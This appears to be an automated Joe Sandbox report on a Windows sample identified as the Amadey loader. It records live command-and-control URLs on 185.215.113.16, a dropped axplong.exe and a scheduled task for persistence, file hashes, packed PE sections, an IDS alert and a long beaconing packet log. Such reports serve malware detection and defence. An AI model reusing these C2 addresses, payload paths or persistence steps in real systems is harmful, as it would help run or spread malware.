                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                185.215.113.168y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                                                • 185.215.113.16/soka/random.exe
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16/Jo89Ku7d/index.php

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                • 185.215.113.37
                                                                8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                                                                • 185.215.113.103
                                                                file.exeGet hashmaliciousStealcBrowse
                                                                • 185.215.113.37
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 185.215.113.37
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16
                                                                file.exeGet hashmaliciousStealcBrowse
                                                                • 185.215.113.37
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16
                                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                                • 185.215.113.37
                                                                file.exeGet hashmaliciousAmadeyBrowse
                                                                • 185.215.113.16

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1923072
                                                                  Entropy (8bit):7.94989797306349
                                                                  Encrypted:false
                                                                  SSDEEP:49152:yndcjiRsr7EcYYIpTdp08efz7c2QL7nqIGg0HlpI4:eZR66TdWfXc2aTDYI
                                                                  MD5:73ACB4CC181ACA9525AB9F599500B9CA
                                                                  SHA1:46A29F8B0E10003F85A8EAE8A46473D0344650DF
                                                                  SHA-256:4BC8AB389044AABD25719E924300530FEDDAE8EFA8A485CBFD67DE8F347132F2
                                                                  SHA-512:F84E777E3591E00A8C7AC53AD47554D100AEC16F19E143DD69447CD2D3872975C5C673F2AB1A8C66A164D0DEC73D8876A7D9064386EB90C0474E55C2187CE5C0
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 55%
                                                                  Joe Sandbox View:
                                                                  • Filename: 8y4qT1eVpi.exe, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................L...........@...........................L...........@.................................W...k............................kL..............................kL..................................................... . ............................@....rsrc...............................@....idata ............................@... ..+.........................@...dmbsosmk.@...02..>..................@...uuntaxqq.....pL......2..............@....taggant.0....L.."...6..............@...........................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                  C:\Windows\Tasks\axplong.job

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):304
                                                                  Entropy (8bit):3.449259938803551
                                                                  Encrypted:false
                                                                  SSDEEP:6:AMERvmVXlXUEZ+lX1lOJUPelkDdtE9+AQy0lbXdt0:AMERI1Q1lOmeeDs9+nVLdt0
                                                                  MD5:FC29F7659967AE584FCD3DF81A7A6873
                                                                  SHA1:D099B0CB02EAFBF0CECFA13D320CA43DFEFC4037
                                                                  SHA-256:59DFDA5FB6236BF51139515F7AAD7CA195E4CD2F98DE6678A0B4E71C17ECEE78
                                                                  SHA-512:AEE956F795938358C3B9EEFED53B4B0AC591486CE33FBBB20C9A10DD86F02A884CDE557729EA2C6355089479F2D7D86A6CEBD7A5B1A09DB0BE41588FA2695395
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:....6.l.v.GJ.[KJ..*.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0...................@3P.........................

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.94989797306349
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:file.exe
                                                                  File size:1'923'072 bytes
                                                                  MD5:73acb4cc181aca9525ab9f599500b9ca
                                                                  SHA1:46a29f8b0e10003f85a8eae8a46473d0344650df
                                                                  SHA256:4bc8ab389044aabd25719e924300530feddae8efa8a485cbfd67de8f347132f2
                                                                  SHA512:f84e777e3591e00a8c7ac53ad47554d100aec16f19e143dd69447cd2d3872975c5c673f2ab1a8c66a164d0dec73d8876a7d9064386eb90c0474e55c2187ce5c0
                                                                  SSDEEP:49152:yndcjiRsr7EcYYIpTdp08efz7c2QL7nqIGg0HlpI4:eZR66TdWfXc2aTDYI
                                                                  TLSH:2C9533676AA1FA45C0592C3D02C611F7EFF43D250F6CAC7B444F50B648AB6AAF399C90
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                                                                  File Icon

                                                                  Icon Hash:00928e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x8c8000
                                                                  Entrypoint Section:.taggant
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:6
                                                                  OS Version Minor:0
                                                                  File Version Major:6
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:6
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp 00007FD4A50EF64Ah

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c6bd80x10dmbsosmk
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x4c6b880x18dmbsosmk
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  0x10000x680000x2de006d50196f7b5ae45824a431eef5b50658False0.9974561478201635data7.986034970037844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x690000x1e00x20091486163663a4305e32eeb4121f91443False0.576171875data4.499495391799583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  0x6b0000x2b80000x2008ea2baa4e0e7f3136a9485542b7cad93unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  dmbsosmk0x3230000x1a40000x1a3e0075cae3cf00182da978937b697cd3d82fFalse0.99479069756624data7.954774902073578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  uuntaxqq0x4c70000x10000x400faf67af2e8789c3ff16ef1f42d4bd344False0.70703125data5.671834197687797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .taggant0x4c80000x30000x220096775bf0feb34cf91c61367962b0c166False0.05859375DOS executable (COM)0.7821275486501513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_MANIFEST0x4c6be80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                  Imports

                                                                  DLLImport
                                                                  kernel32.dlllstrcpy

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-09-27T11:30:14.455258+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.665069185.215.113.1680TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2024 11:30:04.070281029 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:04.075326920 CEST8065060185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:04.075403929 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:04.075659037 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:04.080430984 CEST8065060185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:04.794305086 CEST8065060185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:04.794434071 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:04.796751022 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:04.801544905 CEST8065060185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:05.025235891 CEST8065060185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:05.025603056 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.133064032 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.133234978 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.138057947 CEST8065061185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:05.138169050 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.138307095 CEST8065060185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:05.138406038 CEST6506080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.143078089 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.147933006 CEST8065061185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:05.844012022 CEST8065061185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:05.844069004 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.910186052 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:05.915270090 CEST8065061185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:06.143379927 CEST8065061185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:06.143452883 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.257384062 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.257704020 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.262573004 CEST8065062185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:06.262640953 CEST8065061185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:06.262721062 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.262722015 CEST6506180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.262881994 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.267705917 CEST8065062185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:06.969969988 CEST8065062185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:06.970104933 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.970972061 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:06.975806952 CEST8065062185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:07.201378107 CEST8065062185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:07.201457024 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:07.304362059 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:07.304668903 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:07.309530973 CEST8065063185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:07.309623957 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:07.309784889 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:07.309804916 CEST8065062185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:07.309859991 CEST6506280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:07.314543009 CEST8065063185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:08.027483940 CEST8065063185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:08.027616978 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.028548956 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.033368111 CEST8065063185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:08.258482933 CEST8065063185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:08.258569002 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.369947910 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.370475054 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.375103951 CEST8065063185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:08.375149965 CEST6506380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.375356913 CEST8065064185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:08.375420094 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.375638008 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:08.380359888 CEST8065064185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:09.085366964 CEST8065064185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:09.085513115 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.086894035 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.091706038 CEST8065064185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:09.317621946 CEST8065064185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:09.317765951 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.429265976 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.429682016 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.434386969 CEST8065064185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:09.434510946 CEST6506480192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.434559107 CEST8065065185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:09.434701920 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.435410023 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:09.440174103 CEST8065065185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:10.160864115 CEST8065065185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:10.160957098 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.161812067 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.166698933 CEST8065065185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:10.465637922 CEST8065065185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:10.465697050 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.569952011 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.570311069 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.575052977 CEST8065065185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:10.575090885 CEST8065066185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:10.575141907 CEST6506580192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.575206995 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.575356960 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:10.580101013 CEST8065066185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:11.293389082 CEST8065066185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:11.293482065 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.294153929 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.299027920 CEST8065066185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:11.524995089 CEST8065066185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:11.525130987 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.632523060 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.632908106 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.639854908 CEST8065066185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:11.639878988 CEST8065067185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:11.639957905 CEST6506680192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.640019894 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.640261889 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:11.645503044 CEST8065067185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:12.346571922 CEST8065067185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:12.346641064 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.348256111 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.353259087 CEST8065067185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:12.579307079 CEST8065067185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:12.579442978 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.697112083 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.697452068 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.702305079 CEST8065067185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:12.702475071 CEST6506780192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.702497005 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:12.702608109 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.702795029 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:12.707628965 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.421040058 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.421154022 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.421866894 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.426786900 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.653191090 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.653260946 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.757915020 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.758399963 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.763221979 CEST8065068185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.763258934 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:13.763271093 CEST6506880192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.763323069 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.763535976 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:13.768455982 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.455089092 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.455257893 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.455976963 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.460891962 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.678169012 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.678235054 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.788621902 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.788957119 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.793823004 CEST8065069185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.793893099 CEST6506980192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.794028997 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:14.794099092 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.794277906 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:14.799405098 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.485001087 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.485172987 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.485976934 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.490729094 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.707859039 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.708034039 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.819920063 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.820233107 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.825268030 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.825406075 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.825481892 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.825512886 CEST8065070185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:15.825568914 CEST6507080192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:15.830478907 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.532732010 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.532840014 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.533512115 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.538548946 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.764434099 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.764692068 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.866693020 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.867010117 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.871900082 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.871978998 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.872104883 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.872498035 CEST8065071185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:16.872548103 CEST6507180192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:16.876873016 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.579579115 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.579756021 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.580671072 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.585505962 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.816270113 CEST8065072185.215.113.16192.168.2.6
                                                                  Sep 27, 2024 11:30:17.816406012 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.929208040 CEST6507280192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.929541111 CEST6507380192.168.2.6185.215.113.16
                                                                  Sep 27, 2024 11:30:17.934442997 CEST8065073185.215.113.16192.168.2.6
